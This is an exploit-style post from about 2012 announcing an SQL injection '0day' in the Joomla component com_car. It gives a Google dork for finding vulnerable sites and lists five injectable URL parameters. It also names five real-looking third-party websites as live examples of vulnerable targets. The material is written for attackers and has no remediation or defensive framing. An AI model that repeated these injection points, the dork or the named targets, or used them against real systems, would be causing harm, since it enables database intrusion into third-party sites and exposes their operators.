[ Joomla Component com_car SQL Injection Vulnerability 0day ]

#[~] Author       : the_cyber_nuxbie
#[~] Home         : www.thecybernuxbie.com
#[~] E-mail       : staff@thecybernuxbie.com
#[~] Found        : 20 January 2012 - 07:45 PM.
#[~] Tested On    : Windows 7 Ultimate.
#[~] Google Dork  : inurl:"/index.php?option=com_car"

[x] exploits:

http://localhost/index.php?option=com_car&view=product&modelsid=[SQLi]

http://localhost/index.php?option=com_car&view=product&task=showAll&markid=[SQLi]

http://localhost/index.php?option=com_car&brand_id=[SQLi]

http://localhost/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=[SQLi]

http://localhost/index.php?option=com_car&view=product&markid=&modelsid=[SQLi]

- Example Exploits:
http://mtcauto.com.vn/index.php?option=com_car&view=product&modelsid=3' [SQLi]
http://qnoithat.com/index.php?option=com_car&view=product&task=showAll&markid=1' [SQLi]
http://carwholesale.com/index.php?option=com_car&brand_id=1' [SQLi]
http://mison.vn/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=70' [SQLi]
http://noithathungdung.com.vn/index.php?option=com_car&view=product&markid=&modelsid=3' [SQLi]

- N0T35:
0day no more...
"n0 d0rk f0r kiddi0t"

Thanks To:
All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc...